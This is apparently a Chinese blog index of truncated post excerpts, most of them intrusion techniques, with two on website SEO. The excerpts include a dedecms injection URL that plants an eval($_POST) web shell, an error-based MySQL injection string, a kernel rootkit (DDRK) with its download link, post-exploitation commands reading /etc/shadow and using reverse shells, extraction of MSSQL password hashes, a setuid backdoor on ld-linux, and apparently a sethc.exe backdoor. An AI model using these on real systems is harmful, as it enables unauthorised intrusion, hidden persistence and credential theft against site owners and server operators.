小宝哥哥

摘要： dedecms5.3和5.5系列版本存在重大注入漏洞,请注意以下操作有攻击性,仅供研究.利用此漏洞进行违法活动者,后果自负.作者:张恒假设域名是:www.abc.com攻击步骤如下:1.访问网址:http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>可看见以下错误信息2.访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了.int(3) Error: I 阅读全文

摘要： UNIX网管员主要是靠系统的LOG,来获得入侵的痕迹.当然也有第三方工具记录入侵系统的痕迹,UNIX系统存放LOG文件,普通位置如下:/usr/adm - 早期版本的UNIX/var/adm - 新一点的版本使用这个位置/var/log - 一些版本的Solaris,linux BSD,Free BSD使用这个位置/etc - 多数UNIX版本把utmp放在这里，有些也把wtmp放在这里，syslog.conf在这里下面的一些文件根据你所在的目录不同而不同：acct 或 pacct -- 记录每个用户使用的命令记录access_log -- 主要当服务器运行NCSA HTTPD时, 记录什么站 阅读全文

摘要： DDRK是一个Linux结合shv和adore-ng优点，内核级别的rootkit。DDRK中包含的文件：netstat #替换系统中的netstat，从ssh配置文件中读取端口并隐藏rk.ko #内核模块，实现文件和进程的隐藏功能setup #rootkit安装文件tty #ava工具bin.tgz ---ttymon ---sshd.tgz ---.sh ---shdcf2 #sshd配置文件 ---shhk ---shhk.pub ---shrs ---sshd #sshd主程序DDRK下载地址：http://www.sectop.com/soft/ddrk.tgz因此只要把这些文件上传 阅读全文

摘要： cat /etc/passwd 查看linux用户cat /etc/shadow 查看用户密码需要root权限cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息ifconfig 查看本机ip信息cat /etc/resolv.conf 查看DNS信息bash -i 在反弹的shell中使用可以直观显示命令bash prompt: 当你以普通限权用户身份进入的时候，一般你会有一个类似bash$的prompt。当你以Root登陆时，你的prompt会变成 bash#。 系统变量 : 试着echo "$USER 阅读全文

摘要： 都说站长不容易啊，辛辛苦苦做好一个站，一不小心就可能得罪了百度，受到惩罚，而首页被百度K这是比较常见的一种情况，在百度一搜索首页被K这个关键词，结果高达上百万，可见有不少站长被这个问题困扰，针对这个问题，有不少站长提出了自己的见解，为大家提供了自己的解决方法。目前，比较流行的方案主要是以下的几种解决方案。 第一：网站百度不收录首页，其他的内页正常的收录。 这种情况下，首先应该检查友情链接。仔细找找首页上面挂的友情链接，看看是不是有被百度K的站，发现的话马上把对方的友链去除掉，如果不及时的话肯定自己的站会被百度K掉。除此之外，这种情况最大的可能就是seo优化过度，一个新站在初期优化过度很容易被百 阅读全文

摘要： 有时候粘贴键在system32目录下总是无法覆盖或者删除，自动还原成原来的，今天又碰到台服务器是这样的。狠下心来要搞好这玩意，以前一直用的是映像劫持，但是这样不安全。 无意间GG搜素了下:sethc.exe 删除。看到首页的一篇文章抱着试试的态度操作了下，没想到竟然行了。 1.运行>gpedit.msc>计算机配置—管理模板--系统--windows文件保护改为已禁用2.再去将 Cryptographic Services 这个服务停掉和改成手动或自动。3.现将C:\WINDOWS\system32 的 sethc.exe删掉 (1和2步骤就是为第三步骤的，如果不执行1和2步骤se 阅读全文

摘要： 没钱推广网站?这是一个很严峻的问题，也是一个很现实的问题。于是涉及到另外一个问题：没钱就不能推广自己的网站吗?答案是否定的。没钱照样可以将一个网站很好的推广出去，这也是零才今天想谈的话题，一是告诉没钱的站长不要放弃推广，二是提醒有钱的站长节约资金的成本，将钱花在刀刃上! 今天只谈免费网站推广的第一步：网站包装。其实很多站长都很了解，在这只是做一个总结，留作对比与参考。 首先，什么是网站包装?包装，packing，即将自己的网站从内部、外部进行一个全方面的策划与设计，主要包括以下几方面：好的域名、漂亮合适的网站风格、好的logo、丰富的网站内容等等。 域名的优势与品牌确实是很强大的，如果你是做博 阅读全文

摘要： http://xxx.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c) Error:Duplicate column name ‘5.0.27-community-nt’Error:Duplicate column name ‘5.0.27-community-nt’http://xxx.cn/qcwh/cont 阅读全文

摘要： mssql的hash保存在表master.dbo.sysxlogins中，用select name,password from master.dbo.sysxlogins可以提取用户hash0x01004E04BE46023057E323AF27269E5B7DDCA140C98D225BDD3D06E8EFE8CFAEC02985B27B38059FA3B18349612B分解：常量部分：0×0100Salt部分：4E04BE46混合密文：023057E323AF27269E5B7DDCA140C98D225BDD3D大写字母密文：06E8EFE8CFAEC02985B27B380 阅读全文

摘要： 方法一：setuid的方法，其实8是很隐蔽。看看过程:[root@localdomain lib]# ls -l |grep ld-linuxlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.solrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.2[root@localdomain lib]# chmod +s ld-linux.so.2[root@localdomain lib]# ls -l |grep ld 阅读全文